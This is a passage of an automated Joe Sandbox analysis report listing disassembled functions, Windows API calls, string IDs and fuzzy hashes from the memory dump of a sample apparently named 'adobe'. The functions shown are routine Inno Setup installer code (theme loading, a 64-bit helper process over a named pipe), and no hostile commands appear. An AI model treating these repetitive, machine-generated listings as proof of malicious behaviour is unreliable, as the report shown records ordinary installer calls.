                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                          • Opcode ID: 5287c43e795efb0446e0849aeecf90da631f9cf0a0768b6f092fd008fa53721d
                                                                                                                                                          • Instruction ID: 885b9387dc4d85ef1a6bcc41b3ac28186c42b97ac018e1411ad6f8b1d6607996
                                                                                                                                                          • Opcode Fuzzy Hash: 5287c43e795efb0446e0849aeecf90da631f9cf0a0768b6f092fd008fa53721d
                                                                                                                                                          • Instruction Fuzzy Hash: CFB09B7770C6006DB705DA95B45192D63E4D7C47203E14577F400D3580D93C58014918
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004165FC Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                                                                                                          • Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
                                                                                                                                                          • Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                                                                                                          • Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00447F7C Relevance: 1.4, APIs: 1, Instructions: 158COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 54ab6fb682ef55532606db5a57a08a75dd55abb6495f2c9f85d92a209ebb08c5
                                                                                                                                                          • Instruction ID: 72cb28a769613da0e12d57a8c8ff31d21ec4f608c404a89b028e4eccd5103e64
                                                                                                                                                          • Opcode Fuzzy Hash: 54ab6fb682ef55532606db5a57a08a75dd55abb6495f2c9f85d92a209ebb08c5
                                                                                                                                                          • Instruction Fuzzy Hash: 87518570E041459FEB01EFA9C482AAEBBF5EB49304F51817BE500E7351DB389D46CB98
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00401678 Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004016E5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                          • Opcode ID: 461e3ea3c3f350111c30ebcaae036f378a8db35a49b87e0ff078fda23b500ab0
                                                                                                                                                          • Instruction ID: a6e7c4f6b24507bbfa1b5e3bb33a91ffb91a5c0164af84241c7500694563929a
                                                                                                                                                          • Opcode Fuzzy Hash: 461e3ea3c3f350111c30ebcaae036f378a8db35a49b87e0ff078fda23b500ab0
                                                                                                                                                          • Instruction Fuzzy Hash: 3D11C272A057019FC3108F19CC80A2BB7E5EFC4364F09C93DE598673A4D735AC409789
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041F3D4 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                          • Opcode ID: f03d6e23e0814ed38ad111c485b9c5f56edcb767316cc9ebf57e90da0b95743e
                                                                                                                                                          • Instruction ID: b55a7b9a32de56e4c0cdb05f5aaeda5055a0700d8eb896d56cc2d0e0b2117302
                                                                                                                                                          • Opcode Fuzzy Hash: f03d6e23e0814ed38ad111c485b9c5f56edcb767316cc9ebf57e90da0b95743e
                                                                                                                                                          • Instruction Fuzzy Hash: F01148742007069BC710DF19C880B86FBE4EB98390B14C53BE9988B385D374E8598BA9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00452634 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(00000000,0045269D), ref: 0045267F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                          • Opcode ID: ba20ea88db32640572c9e80b2efaab73f3d569c0a3c1dfb5018a64da4f3a5f6e
                                                                                                                                                          • Instruction ID: fbdab6b76a9d3b96366ddb67014f1af99c6df0f6a37962f4a3f47f1f4f19d995
                                                                                                                                                          • Opcode Fuzzy Hash: ba20ea88db32640572c9e80b2efaab73f3d569c0a3c1dfb5018a64da4f3a5f6e
                                                                                                                                                          • Instruction Fuzzy Hash: 03017035604204AF8B00DF699C004FEF7F8DB8A3207608277FC28D3352DB745D199664
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040170C Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,?,?,000030C8,000070CB,00401973), ref: 00401766
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                          • Opcode ID: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
                                                                                                                                                          • Instruction ID: 2f1b12c935ae24389c3dd8db424781fbbcf1746defe36878ea7ad6421184be39
                                                                                                                                                          • Opcode Fuzzy Hash: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
                                                                                                                                                          • Instruction Fuzzy Hash: 0C0170766043108FC3109F29DCC4E2677E8D780378F05413EDA84673A0D37A6C0187D9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00406F50 Relevance: 1.3, APIs: 1, Instructions: 3COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                          • Opcode ID: 0ff4ee60063cca5cc388bed8bc269adaedd678e8b63f1737cb83f885b9663226
                                                                                                                                                          • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                                                                                          • Opcode Fuzzy Hash: 0ff4ee60063cca5cc388bed8bc269adaedd678e8b63f1737cb83f885b9663226
                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 0044AEAC Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 252libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0044AE58: GetVersionExA.KERNEL32(00000094), ref: 0044AE75
                                                                                                                                                          • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004972BA), ref: 0044AED3
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B01D
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B02F
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B041
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B053
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B065
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B077
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B089
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B09B
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B0AD
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B0BF
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B0D1
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B0E3
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B0F5
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B107
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B119
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B12B
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B13D
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B14F
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B161
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B173
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B185
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B197
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B1A9
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B1BB
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B1CD
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B1DF
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B1F1
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B203
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B215
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B227
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$LibraryLoadVersion
                                                                                                                                                          • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                                                                          • API String ID: 1968650500-2910565190
                                                                                                                                                          • Opcode ID: 3b5ed5aea82f440f1ac1c12c3b524ca588b5889b7cf3765a5a7d5995296d9664
                                                                                                                                                          • Instruction ID: a412a743d8d6f7d45af61582fe4c6e78a33dc70606a22357c48ac29c98de50d6
                                                                                                                                                          • Opcode Fuzzy Hash: 3b5ed5aea82f440f1ac1c12c3b524ca588b5889b7cf3765a5a7d5995296d9664
                                                                                                                                                          • Instruction Fuzzy Hash: 5991C9B0640B50EBEF00EFF598C6A2A36A8EB15B14714457BB444EF295D778C814CF9E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00457DE8 Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 186pipeprocessfileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00457E4F
                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(02333858,00000000,004580E2,?,?,02333858,00000000,?,004587DE,?,02333858,00000000), ref: 00457E58
                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(02333858,02333858), ref: 00457E62
                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,02333858,00000000,004580E2,?,?,02333858,00000000,?,004587DE,?,02333858,00000000), ref: 00457E6B
                                                                                                                                                          • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00457EE1
                                                                                                                                                          • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02333858,02333858), ref: 00457EEF
                                                                                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00498B04,00000003,00000000,00000000,00000000,0045809E), ref: 00457F37
                                                                                                                                                          • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045808D,?,00000000,C0000000,00000000,00498B04,00000003,00000000,00000000,00000000,0045809E), ref: 00457F70
                                                                                                                                                            • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458019
                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045804F
                                                                                                                                                          • CloseHandle.KERNEL32(000000FF,00458094,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458087
                                                                                                                                                            • Part of subcall function 00452B0C: GetLastError.KERNEL32(00000000,0045357D,00000005,00000000,004535B2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496A6D,00000000), ref: 00452B0F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                                                                                          • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                                                                                          • API String ID: 770386003-3271284199
                                                                                                                                                          • Opcode ID: a1c450d8ffa61f2b1e923d7f39d76a49e90faac0dc805e9488091df0f68956b4
                                                                                                                                                          • Instruction ID: b563b2c895ae2dba4144f0cf50b55dbfcef9f20904619bb7072887bec0bf6eb4
                                                                                                                                                          • Opcode Fuzzy Hash: a1c450d8ffa61f2b1e923d7f39d76a49e90faac0dc805e9488091df0f68956b4
                                                                                                                                                          • Instruction Fuzzy Hash: CA713270A047449EDB10DF69CC46B9EBBF4AB05705F1084BAF908FB282DB785948CF69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00477120 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 94COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00476F8C: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02332BD0,?,?,?,02332BD0,00477150,00000000,0047726E,?,?,-00000010,?), ref: 00476FA5
                                                                                                                                                            • Part of subcall function 00476F8C: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476FAB
                                                                                                                                                            • Part of subcall function 00476F8C: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02332BD0,?,?,?,02332BD0,00477150,00000000,0047726E,?,?,-00000010,?), ref: 00476FBE
                                                                                                                                                            • Part of subcall function 00476F8C: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02332BD0,?,?,?,02332BD0), ref: 00476FE8
                                                                                                                                                            • Part of subcall function 00476F8C: CloseHandle.KERNEL32(00000000,?,?,?,02332BD0,00477150,00000000,0047726E,?,?,-00000010,?), ref: 00477006
                                                                                                                                                            • Part of subcall function 00477064: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004770F6,?,?,?,02332BD0,?,00477158,00000000,0047726E,?,?,-00000010,?), ref: 00477094
                                                                                                                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 004771A8
                                                                                                                                                          • GetLastError.KERNEL32(00000000,0047726E,?,?,-00000010,?), ref: 004771B1
                                                                                                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004771FE
                                                                                                                                                          • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00477222
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00477253,00000000,00000000,000000FF,000000FF,00000000,0047724C,?,00000000,0047726E,?,?,-00000010,?), ref: 00477246
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
